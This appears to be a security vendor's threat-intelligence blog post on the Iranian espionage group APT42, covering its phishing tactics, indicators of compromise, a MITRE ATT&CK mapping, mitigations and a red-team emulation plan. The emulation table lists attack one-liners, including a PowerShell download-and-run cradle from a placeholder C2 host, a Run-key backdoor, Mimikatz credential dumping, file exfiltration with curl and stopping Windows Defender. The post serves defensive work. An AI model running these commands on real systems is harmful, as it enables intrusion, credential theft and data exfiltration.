APT42: Operations, IOCs, Tactics, Detection Strategies
- Mar 9
- 7 min read
Updated: Mar 28
Introduction
APT42, also known as "Charming Kitten," "Phosphorus," TA453, Mint Sandstorm, and Yellow Garuda, is an Iranian state-sponsored cyber espionage group assessed to operate on behalf of the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization. Active since at least 2015, APT42 has consistently targeted governments, NGOs, journalists, think tanks, academics, and individuals of strategic interest to Iran. As of 2024, the U.S. and Israel accounted for roughly 60% of the group's known geographic targeting, with continued campaigns against Israeli defense and diplomatic personnel and individuals affiliated with U.S. presidential campaigns.
In this blog, we explore APT42's tactics, techniques, and procedures (TTPs), provide updated indicators of compromise (IOCs), and share an emulation plan to help defenders detect and mitigate this persistent threat.
APT42's Modus Operandi
APT42 relies on highly targeted spear-phishing and prolonged social engineering to build trust before stealing credentials or deploying malware. Operations fall into three categories: credential harvesting (including MFA bypass), surveillance (Android malware, location and communications tracking), and selective use of Windows malware to support broader objectives.
Commonly Used Techniques
Spear-Phishing and Trust Building: APT42 conducts extended email conversations, impersonates journalists, researchers, and legitimate organizations (e.g., Institute for the Study of War, Brookings Institution, Washington Institute for Near East Policy), and uses benign PDFs or links before delivering malicious content. Fake podcast and webinar invitations have been used to deliver malware (e.g., July 2024 BlackSmith campaign).
Credential Theft and Phishing Kits: The group operates sophisticated credential-harvesting kits such as GCollection, LCollection, and YCollection (targeting Google, Hotmail, Yahoo), and the DWP browser-in-the-browser kit. They abuse Google Sites, Google Drive, Dropbox, OneDrive, and URL shorteners to host phishing pages and redirects. Typosquatted domains (e.g., understandingthewar[.]org, brookings[.]email) mimic legitimate organizations.
Multi-Stage Malware: Beyond credential theft, APT42 has deployed custom backdoors and loaders. In 2024, the group introduced the BlackSmith toolkit delivering AnvilEcho, a PowerShell implant that succeeds CharmPower and GorjolEcho, with capabilities for reconnaissance, screenshot capture, file exfiltration, and C2 communication. Delivery has included malicious ZIP archives containing Windows shortcut (LNK) files, often via Google Drive or DocSend-style links.
Exploitation of Trust: The group impersonates trusted entities and research institutions, sets up fake video-call lures (Google Meet, OneDrive, Dropbox, Skype), and uses legitimate-looking attachments to condition targets before sending phishing links via Signal, Telegram, or WhatsApp.
Mobile Targeting: APT42 continues to target Android devices with spyware that exploits Accessibility Services to monitor communications, track location, and surveil activists and persons of interest.
Recent Activity (2024)
Between February and late July 2024, APT42 intensified targeting of Israel and the U.S., including Israeli military and defense officials, diplomats, academics, NGOs, and individuals affiliated with U.S. presidential campaigns. Google TAG reported resetting compromised accounts, blocking malicious domains, and dismantling APT42-created Google Sites phishing pages.
In April 2024, the group used Google Sites pages masquerading as a petition from the Jewish Agency for Israel and targeted former Israeli military officials and diplomats with social engineering emails. In June, campaigns used benign PDFs with shortened URLs leading to credential-harvesting landing pages.
In July 2024, Proofpoint and others documented TA453/APT42 targeting a prominent religious figure with a fake podcast invitation impersonating the Institute for the Study of War. The campaign used the spoofed domain understandingthewar[.]org and delivered the BlackSmith malware toolkit (including the AnvilEcho PowerShell implant) via a Google Drive-hosted ZIP containing a malicious LNK.
Throughout 2024, Google TAG observed APT42 targeting personal email accounts of individuals affiliated with U.S. presidential campaigns and disrupting credential-phishing attempts. High-risk users were advised to enroll in Google's Advanced Protection Program.
Key Indicators of Compromise (IOCs)
The following IOCs are associated with APT42 campaigns as of 2024. Infrastructure and hashes rotate frequently; use current threat intelligence feeds and vendor reports for the latest indicators.
Domains and URLs (2024)
understandingthewar[.]org (impersonates Institute for the Study of War; BlackSmith campaign)
brookings[.]email (impersonates Brookings Institution)
panel-short-check[.]live (GCollection phishing kit)
check-pabnel-status[.]live (GCollection phishing kit)
accredit-navigation[.]online (DWP phishing kit)
checking-paneling[.]live
short-ion-per[.]live
smaaaal[.]cfd
click-choose-figured[.]cfd
meetroomonlin1925.w3spaces[.]com
sharedrive.webredirect[.]org
visioneditor.loseyourip[.]com
s3api[.]shop
Legacy and historically reported domains (may be defunct): acconut-signin[.]com, account-signin[.]com, secure-verify[.]net, mail-update[.]org, update-service[.]info, and similar typo-squatted patterns.
IP Addresses
49.13.194[.]118 (C2 – OFFICEFUEL/FUELDUMP)
91.107.150[.]184 (C2 – OFFICEFUEL/FUELDUMP)
File Hashes (2024)
c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32 (NEWSTERMINAL)
bc2597ce09987022ff0498c6710a9b51a1a47ed8082ac044be2838b384157527 (OFFICEFUEL)
baac058ddfc96c8aea8c0057077505f0ad3ff20311d999886fed549924404849 (OFFICEFUEL)
0180f4f29c550aa1ffaa21af51711b29de99fb1d7c932d008a0e9356ae8a7d60 (FUELDUMP)
f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060 (FUELDUMP)
82ae2eb470a5a16ca39ec84b387294eaa3ae82e5ada4b252470c1281e1f31c0a (FUELDUMP)
89c1d1b61d7f863f8a651726e29f2ae3de7958f36b49a756069021817947d06c (FUELDUMP)
c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 (GORBLE PS – LNK)
33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 (GORBLE PS – Stage 1)
4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f (GORBLE PS – Stage 2)
Tactics, Techniques, and Procedures (TTPs)
APT42 is tracked as MITRE ATT&CK group G1044; closely related activity is also documented under G0059 (Charming Kitten / Magic Hound / TA453). Recent 2024 activity has emphasized spear-phishing with malicious LNK and ZIP delivery (e.g., BlackSmith/AnvilEcho), abuse of cloud storage and URL shorteners, and credential-harvesting kits (GCollection, DWP) supporting MFA and recovery-code capture. Below is a breakdown of techniques mapped to the MITRE ATT&CK framework:
Category | MITRE ATT&CK ID | Description |
|---|---|---|
Initial Access | T1133 | External Remote Services |
Initial Access | T1566.001 | Spear-phishing Attachment |
Initial Access | T1566.002 | Spear-phishing Link |
Execution | T1047 | Windows Management Instrumentation |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic |
Execution | T1059.007 | Command and Scripting Interpreter: JavaScript/Jscript |
Execution | T1569.002 | System Services: Service Execution |
Execution | T1204.001 | User Execution: Malicious Link |
Execution | T1204.002 | User Execution: Malicious File |
Persistence | T1098.002 | Account Manipulation: Exchange Email Delegate Permissions |
Persistence | T1133 | External Remote Services |
Persistence | T1543.003 | Create or Modify System Process: Windows Service |
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Persistence | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL |
Privilege Escalation | T1055 | Process Injection |
Privilege Escalation | T1134 | Access Token Manipulation |
Privilege Escalation | T1543.003 | Create or Modify System Process: Windows Service |
Privilege Escalation | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Privilege Escalation | T1547.004 | Boot or Logon Autostart Execution: Winlogon Helper DLL |
Defense Evasion | T1027.002 | Obfuscated Files or Information: Software Packing |
Defense Evasion | T1027.005 | Obfuscated Files or Information: Indicator Removal from Tools |
Defense Evasion | T1055 | Process Injection |
Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion |
Defense Evasion | T1112 | Modify Registry |
Defense Evasion | T1134 | Access Token Manipulation |
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Defense Evasion | T1221 | Template Injection |
Defense Evasion | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Defense Evasion | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion |
Discovery | T1564.003 | Hide Artifacts: Hidden Window |
Discovery | T1012 | Query Registry |
Discovery | T1016 | System Network Configuration Discovery |
Discovery | T1082 | System Information Discovery |
Discovery | T1083 | File and Directory Discovery |
Discovery | T1087.001 | Account Discovery: Local Account |
Discovery | T1497.001 | Virtualization/Sandbox Evasion: System Checks |
Discovery | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion |
Discovery | T1518 | Software Discovery |
Lateral Movement | T1021.001 | Remote Services: Remote Desktop Protocol |
Lateral Movement | T1021.004 | Remote Services: SSH |
Credential Access | T1003 | OS Credential Dumping |
Credential Access | T1111 | Two-Factor Authentication Interception |
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
Command and Control | T1071.002 | Application Layer Protocol: File Transfer Protocols |
Command and Control | T1095 | Non-Application Layer Protocol |
Command and Control | T1102 | Web Service |
Command and Control | T1105 | Ingress Tool Transfer |
Command and Control | T1132 | Data Encoding: Standard Encoding |
Command and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptographic |
Exfiltration | T1041 | Exfiltration over C2 Channel |
Impact | T1529 | System Shutdown/Reboot |
Collection | T1056.001 | Input Capture: Keylogging |
Collection | T1113 | Screen Capture |
Collection | T1115 | Clipboard Data |
Collection | T1123 | Audio Capture |
Collection | T1125 | Video Capture |
Collection | T1213 | Data from Information Repositories: Sharepoint |
Collection | T1560.002 | Archive Collected Data: Archive via Library |
Emulation Plan for APT42
Environment Setup
Component | Details |
|---|---|
Active Directory (AD) Domain | 2 Windows Servers + 3 Windows Clients |
Endpoints | 2 Linux (Ubuntu/Kali), 2 Windows 10/11 Machines |
SIEM/XDR | ELK Stack / Splunk / Microsoft Sentinel |
Network Monitoring | Suricata / Zeek (formerly Bro) |
Phishing Server | GoPhish for simulating attacks |
C2 Framework | Covenant / Cobalt Strike / Empire |
Mobile Device Setup | Android VM with APT42-based malware |
Emulation Plan
Tactic | Emulation Actions | Tools/Commands |
|---|---|---|
Reconnaissance | Perform OSINT and social media research to identify personal email addresses and security postures (e.g., MFA type). | theHarvester -d example.com -b google |
Initial Access | Spear-phish with fake webinar/podcast lures; host malicious LNK/ZIP on cloud storage (e.g., Google Drive). Use Evilginx2 or GCollection-style kits for MFA bypass. | GoPhish + malicious LNK in ZIP |
Execution | Deploy PowerShell implants (AnvilEcho-style): staged execution via LNK, script-based C2. Use LOLBins and mshta for execution. | IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1') |
Persistence | Registry Run keys, Windows services, Winlogon helper DLL. Android: AccessibilityService abuse for surveillance. | reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Users\Public\backdoor.exe" |
Privilege Escalation | Token manipulation, credential dumping (Mimikatz), service abuse. | sekurlsa::logonpasswords |
Credential Access | OS credential dumping, keylogging, MFA/recovery-code interception via phishing kits. | Invoke-Mimikatz -DumpCreds |
Lateral Movement | RDP, SMB, SSH for lateral movement. | Invoke-SMBExec -Target victim-host -Credential $creds |
Exfiltration | Exfil over C2 channel; abuse cloud storage (Drive, OneDrive) and DNS tunneling. | curl -F "file=@data.zip" https://drive.google.com/upload |
Impact | Disable security tools; delete event logs. | net stop WinDefend |
Mitigation Strategies
To defend against APT42 and similar threats, implement the following:
User Training: Train staff on prolonged social engineering, fake podcast/webinar lures, and typosquatted domains. Encourage verification of sender identity and URLs before clicking or entering credentials.
Strong MFA and Account Hardening: Enforce phishing-resistant MFA where possible. High-risk users (e.g., government, campaigns, journalists, NGOs) should consider Google's Advanced Protection Program (APP) or equivalent to limit application passwords and reduce credential abuse.
Endpoint Detection and Response (EDR): Detect PowerShell execution, LNK/ZIP-based delivery, and LOLBin abuse. Hunt for AnvilEcho-style C2 and screenshot/exfil behaviors.
Network and Email Security: Block or alert on known APT42 domains and phishing kit URLs. Monitor for abuse of Google Drive, OneDrive, Dropbox, and URL shorteners in phishing flows.
Mobile Device Management (MDM): Enforce policies to limit sideloading and monitor for Android spyware abusing Accessibility Services.
Threat Intelligence: Subscribe to vendor reports (e.g., Google TAG, Mandiant, Proofpoint) and use current IOCs; APT42 infrastructure rotates frequently.
Conclusion
APT42 remains a persistent, state-sponsored threat with evolving tactics—including new malware (BlackSmith/AnvilEcho), abuse of trusted platforms, and focused targeting of Israel and U.S. political and defense figures. By understanding their TTPs, using updated IOCs, and emulating their behavior in controlled environments, defenders can improve detection and mitigation.
References
Google Cloud Blog – APT42: Crooked Charms, Cons, and Compromises: https://cloud.google.com/blog/topics/threat-intelligence/apt42-charms-cons-compromises/
Google Cloud Blog – Untangling Iran's APT42 Operations: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
Google TAG – Iranian backed group steps up phishing campaigns against Israel, U.S. (Aug 2024): https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phishing-campaigns-against-israel-us
Proofpoint – TA453 Targets Religious Figure with Fake Podcast Invite Delivering BlackSmith (Jul 2024): https://www.proofpoint.com/us/blog/threat-insight/best-laid-plans-ta453-targets-religious-figure-fake-podcast-invite-delivering
MITRE ATT&CK – APT42 (G1044): https://attack.mitre.org/groups/G1044/
MITRE ATT&CK – Charming Kitten / Magic Hound (G0059): https://attack.mitre.org/groups/G0059/
Register for instructor-led online courses today! https://www.darkrelay.com/courses
Check out our self-paced learning paths!
Explore our bundled Pricing & Plans for cost-effective options! Buy a course subscription to learn more, hands-on labs and expert-led training included. https://www.darkrelay.com/plans-pricing
Contact us for custom pentesting needs at: info@darkrelay.com or WhatsApp.
Comments